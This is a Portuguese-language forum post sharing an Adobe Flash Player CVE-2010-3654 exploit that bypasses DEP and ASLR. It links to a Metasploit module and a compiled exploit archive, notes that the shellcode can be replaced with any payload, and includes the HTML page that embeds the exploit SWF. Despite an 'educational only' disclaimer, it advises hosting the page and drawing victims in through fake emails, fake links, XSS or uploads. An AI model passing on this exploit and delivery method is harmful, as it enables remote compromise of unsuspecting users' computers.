Jump to content
herakty

Adobe Flash Player < 10.1.53 .64 Action Script Type Confusion Exploit (DEP+ASLR

Recommended Posts

herakty

anonymous-thumbnail.gif

NOTA: Todos os exploits e técnicas de exploitation são para fins educacionais na formação de Pen Testers.. USAR ALVOS EM VM´s (são provas de conceito, mas como é óbvio funcionam, pois são para provar

Detalhes da vulnerabilidade

Exploiting Adobe Flash Player on Windows 7

http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/

Exploit pronto e adaptado para o metasploit... é só disparar... (neste caso deve-se seguir o método Mestasploit WebAttack)

http://downloads.securityfocus.com/vulnerabilities/exploits/44504-adobe_flashplayer_button.rb

Mais Info sobre o ataque por browser com metasploit

http://defcon.org/images/defcon-17/dc-17-presentations/defcon-17-egypt-guided_missiles_metasploit.pdf

http://www.offensive-security.com/metasploit-unleashed/Browser_Autopwn'>http://www.offensive-security.com/metasploit-unleashed/Browser_Autopwn

http://www.offensive-security.com/metasploit-unleashed/ (tudo sobre o metasploit e muito bom para iniciantes)

Se tiverem um site para onde através de engenharia social ou outros meios (fake mails ou links falsos é eng. social). Coloquem esta página com o flash com o exploit compilado... o processo nesta caso é o CALC.EXE

Exploit do flash com código fonte e compilado também (podem usar qulquer outro shellcode... vejam no file Real_Ref_Class.as, na função (public static function shellcode())

http://www.exploit-db.com/sploits/CVE-2010-3654_Win7.zip

Página HTML onde devem chamar o Flash com o exploit... se conseguirem UPLOAD para o servidor por algum meio... mts vezes dá para embeber flash em editores ou recorrendo a um exploit (WMPAP/METASPLOIT) ou XSS

<html>
<head>

<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Flash Player CVE-2010-3654 Advanced Win7 Exploitation Dep+ASLR Bypass</title>
<h1>Abysssec Present :</h1>
<h4> - Step 1: Reading Internal Object Pointer </h4>
<h4> - Step 2: Reading memory values and leaking module imagebase (ASLR bypass)</h4>
<h4> - Step 3: Using another leak for shellcode address</h4>
<h4> - Step 4: Using ROP to call VirtualProtect in (flash10h.ocx) and mark memory as executeable (DEP bypass)</h4>
<h4> - Step 5: Execute Shellcode</h4>
<h4> - Step 6: Wait 3 Second</h4>
<h4> - Step 7: Victory Dance</h4>
<br>
<h4> Questions : shahin@abysssec.com </h4>
<h4> Requests  : info@abysssec.com </h4>

</head>
<body >
<embed src="exploit.swf" id="flash" quality="high" scale="exactfit" width="450" height="450" name="squambido" align="middle" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>    

</body>
</html>

sonhos cor de rosa

NSF-CDC - ANON

teckV

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.